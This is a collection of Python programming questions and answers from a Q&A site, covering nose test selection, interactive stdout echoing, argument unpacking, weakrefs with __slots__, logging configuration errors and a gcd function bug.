loader = unittest.TestLoader()
safetests = loader.loadTestsFromTestCase(SafeTests)
suite.addTests(safetests)
if TARGET != 'prod':
unsafetests = loader.loadTestsFromTestCase(BombTests)
suite.addTests(unsafetests)
unittest.TextTestRunner().run(suite)
I have major problem, and one interesting point
* I would like to be using nose or py.test (doestn't really matter which)
* I have a large number of different applications that are exposing these test suites via entry points.
I would like to be able to aggregate these custom tests across all installed
applications so I can't _just_ use a clever naming convention. I don't
_particularly_ care about these being exposed through entry points, but I
**do** care about being able to run tests across applications in site-
packages. (Without just importing... every module.)
I do _not_ care about maintaining the current dependency on
`unittest.TestCase`, trashing that dependency is practically a goal.
* * *
**EDIT** This is to confirm that @Oleksiy's point about passing args to
`nose.run` does in fact work with some caveats.
Things that _do not_ work:
* passing all the files that one wants to execute (which, _weird_)
* passing all the _modules_ that one wants to execute. (This either executes nothing, the wrong thing, or too many things. Interesting case of 0, 1 or many, perhaps?)
* Passing in the modules _before_ the directories: the directories have to come first, or else you will get duplicate tests.
This fragility is absurd, if you've got ideas for improving it I welcome
comments, or I set up [a github repo with my experiments trying to get this to
work](https://github.com/quodlibetor/test-loading-experiment).
All that aside, The following works, including picking up multiple projects
installed into site-packages:
#!python
import importlib, os, sys
import nose
def runtests():
modnames = []
dirs = set()
for modname in sys.argv[1:]:
modnames.append(modname)
mod = importlib.import_module(modname)
fname = mod.__file__
dirs.add(os.path.dirname(fname))
modnames = list(dirs) + modnames
nose.run(argv=modnames)
if __name__ == '__main__':
runtests()
which, if saved into a `runtests.py` file, does the right thing when run as:
runtests.py project.tests otherproject.tests
Answer: For nose you can have both tests in place and select which one to run using
[attribute](http://nose.readthedocs.org/en/latest/plugins/attrib.html "attrib
plugin") plugin, which is great for selecting which tests to run. I would keep
both tests and assign attributes to them:
from nose.plugins.attrib import attr
@attr("safe")
class SafeTests(unittest.TestCase):
# snip 20 test functions
class BombTests(unittest.TestCase):
# snip 10 different test cases
For you production code I would just call nose with `nosetests -a safe`, or
setting `NOSE_ATTR=safe` in your os production test environment, or call run
method on nose object to run it natively in python with `-a` command line
options based on your `TARGET`:
import sys
import nose
if __name__ == '__main__':
module_name = sys.modules[__name__].__file__
argv = [sys.argv[0], module_name]
if TARGET == 'prod':
argv.append('-a slow')
result = nose.run(argv=argv)
Finally, if for some reason your tests are not discovered you can explicitly
mark them as test with `@istest` attribute (`from nose.tools import istest`)
|
Output from sys.stdout in interactive mode
Question: I tested sys.stdout.write in interactive mode; why do I get the 'extra' 1 and
2 suffixed to the numbers? If I run the code from a file I get the expected
output (1234...) Python 3.3 on a Windows machine
>>> import sys
>>> for i in range(15):
... sys.stdout.write(str(i))
...
01
11
21
31
41
51
61
71
81
91
102
112
122
132
142
>>>
Answer: Python is _also_ echoing the return value of `sys.stdout.write()` call, which
is the number of bytes written:
>>> import sys
>>> written = sys.stdout.write('10')
10>>> written
2
Here the next prompt follows the `'10'` written without a newline.
Or, as a different way of demoing, writting 0 bytes in a loop prints `0` that
many times:
>>> for i in range(3):
... sys.stdout.write('')
...
0
0
0
|
Where does python argument unpacking fall into the order of operations?
Question: <http://docs.python.org/2/reference/expressions.html#operator-precedence>
My guess is that it falls into one of the buckets above dict lookups since
func(*mydict[mykey])
does the dictionary lookup first. Is there a better chart than my initial link
that goes into more detail regarding order of operations in python?
Answer: The unpacking `*` is not an operator; it's part of the call syntax. It's
defined under
[Calls](http://docs.python.org/2/reference/expressions.html#calls), where you
can see that:
["," "*" expression]
… can be part of an `argument_list` in two different places. (The semantics
are described in the paragraphs starting "If there are more positional…" and
"If the syntax…".)
So it takes any `expression`. You can see that no operator takes a full
`expression` as its direct argument. So, if you want to loosely consider `*`
an operator, it binds more loosely than any operator. But just remember that
it isn't actually an operator.
Also keep in mind that this was all changed in Python 3.x. But the basic idea
is the same—both argument unpacking and assignment unpacking take an
`expression`, not just a `primary`, and therefore loosely-speaking bind more
loosely than any operator, which all take a `primary` or something more
specific.
* * *
Meanwhile, you might want to try running the parser on your code to see what
it does:
>>> import ast
>>> tree = ast.parse('func(*mydict[mykey])')
>>> ast.dump(tree)
"Module(body=[Expr(value=Call(func=Name(id='func', ctx=Load()), args=[], keywords=[],
starargs=Subscript(value=Name(id='mydict', ctx=Load()),
slice=Index(value=Name(id='mykey', ctx=Load())), ctx=Load()), kwargs=None))])"
You can see that the entire `Subscript` expression ends up as the `starargs`
to the `Call`.
The `ast` module uses the [Abstract
Grammar](http://docs.python.org/2/library/ast.html#abstract-grammar) rather
than the one described in the reference manual. It has different names for
things, and doesn't handle some things that are considered part of the grammar
but actually done at a higher level than the parser, and so on—but, on the
other hand, it's a lot easier to take in all at once. You can see that an
`expr` used for `starargs` can be a `Subscript`.
|
Weakref and __slots__
Question: Consider the following code:
from weakref import ref
class Klass(object):
# __slots__ = ['foo']
def __init__(self):
self.foo = 'bar'
k = Klass()
r = ref(k)
it works but when I uncomment the `__slots__` it breaks with `TypeError:
"cannot create weak reference to 'Klass' object"` under Python 2.6.
Please, does anyone know if this is an inherent limitation of Python and
`__slots__` or if it is a bug? How to work-around it?
Answer: > Without a `__weakref__` variable for each instance, classes defining
> `__slots__` do not support weak references to its instances. If weak
> reference support is needed, then add `__weakref__` to the sequence of
> strings in the `__slots__` declaration.
From the [Python
documentation](http://docs.python.org/2/reference/datamodel.html#slots).
If you add `__weakref__` to `__slots__`, your code will work:
>>> from weakref import ref
>>>
>>> class Klass(object):
>>> __slots__ = ['foo', '__weakref__']
>>> def __init__(self):
>>> self.foo = 'bar'
>>> k = Klass()
>>> k
=> <__main__.Klass object at ...>
>>> r = ref(k)
>>> r
=> <weakref at ...; to 'Klass' at ...>
|
Logging error involving .conf+main.py modules
Question: I think I'm missing something big and for the life of me, I can't figure it
out. I have a `logging.conf` file that I am trying my main (say, `xyz.py`)
file to read. But I am getting this weird error. I have the traceback below
followed by the configuration file - `logging.conf` and then the relevant part
in `xyz.py`.
File "xyz.py", line 28, in <module>
log = logging.config.fileConfig('/Users/Username/Desktop/logging.conf')
File "/usr/local/Cellar/python/2.7.5/Frameworks/Python.framework/Versions/2.7/lib/python2.7/logging/config.py", line 78, in fileConfig
handlers = _install_handlers(cp, formatters)
File "/usr/local/Cellar/python/2.7.5/Frameworks/Python.framework/Versions/2.7/lib/python2.7/logging/config.py", line 156, in _install_handlers
h = klass(*args)
TypeError: __init__() takes at most 7 arguments (23 given)
The configuration file - full path = `/Users/Username/Desktop/logging.config`
(I followed the instruction from
<http://docs.python.org/release/2.5.2/lib/logging-config-fileformat.html>)
[loggers]
keys=root
[handlers]
keys=handlersmtp, handlerfile
[formatters]
keys=formatter
[formatter_formatter]
format=%(asctime)s %(name)s %(levelname)s %(message)s
datefmt=
class=logging.Formatter
[logger_root]
level=NOTSET
handlers=handlersmtp, handlerfile
[handler_handlersmtp]
class=handlers.SMTPHandler
level= INFO
formatter=formatter
args=(('localhost', 25),'[email protected]', ['[email protected]'],
'The log')
[handler_handlerfile]
class=handlers.RotatingFileHandler
level= INFO
formatter=formatter
backupCount=1440
args=('alogger.log')
The part in main file -`xyz.py`
import logging
import logging.config
log = logging.config.fileConfig('/Users/Username/Desktop/logging.config')
I looked at the Python is logging/config.py module but couldn't follow why it
was raising this. It's a pretty big file.
EDIT:
@VineySajip's answer removed the error above but I am working on this new one
now.
[handler_handlerfile]
class=handlers.RotatingFileHandler
level= INFO
formatter=formatter
args=('alogger.log', mode='a', maxBytes=25000,
backupCount=0, encoding=None, delay=0) #New line to fit
#this page but code has it all in 1 line
The new traceback:
Traceback (most recent call last):
File "cpu6.py", line 29, in <module>
log = logging.config.fileConfig('/Users/Username/Desktop/logging.ini')
File "/usr/local/Cellar/python/2.7.5/Frameworks/Python.framework/
Versions/2.7/lib/python2.7/logging/config.py", line 78, in fileConfig
handlers = _install_handlers(cp, formatters)
File "/usr/local/Cellar/python/2.7.5/Frameworks/Python.framework/
Versions/2.7/lib/python2.7/logging/config.py", line 155, in _install_handlers
args = eval(args, vars(logging))
File "<string>", line 1
('alogger.log', mode='a', maxBytes=25000,
backupCount=0, encoding=None, delay=0)
^
SyntaxError: invalid syntax
Answer: In your config, `('alogger.log')` is not a valid argument tuple, and in fact
the whole section looks wrong. `RotatingFileHandler` has the following
arguments:
filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=0
and you need to specify an argument tuple which reflects this. You haven't
specified a `maxBytes` value, so rollover would never occur; and 1440 looks
like an odd number of backup log files to keep. Review the documentation to
make sure you're using the correct arguments for the handler's `__init__.py`.
**Update:** Leave out the parameter names, like so:
args=('alogger.log', 'a', 25000, 0, None, 0)
|
Python: string formatting and calling functions
Question: So I'm running in to the string formatting error when trying to pass the
arguments num1 and num2 to the function gcd. I'm not sure how to fix this.
Please bear with me since I'm new to Python programming. Thanks!
#!/usr/bin/python
import sys
from collections import defaultdict
lines = sys.stdin.read()
lineArray = lines.split()
listLength = len(lineArray)
def gcd(a, b):
c = 0
if a > b:
r = a%b
if r == 0:
return b
else:
return gcd(b, r)
if a < b:
c = b
b = a
a = c
return gcd(a, b)
for x in range(0, listLength):
num1 = lineArray[x]
num2 = lineArray[x+1]
print num1, 'and', num2
print gcd(num1, num2)
print 'end'
Answer: It's pretty simple. `lineArray` is not a list containing integers, but
strings. So when you do this:
r = a%b
It tries to format the string `a`, instead of calculating `a%b`. To solve
this, convert `a` and `b` to integers:
def gcd(a, b):
a,b = int(a),int(b)
c = 0
if a > b:
r = a%b
if r == 0:
return b
else:
return gcd(b, r)
if a < b:
c = b
b = a
a = c
return gcd(a, b)
Also, in your `gcd` function, the recursion never ends. Hint: You'll have to
check if b is 0. Hope this helps!
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.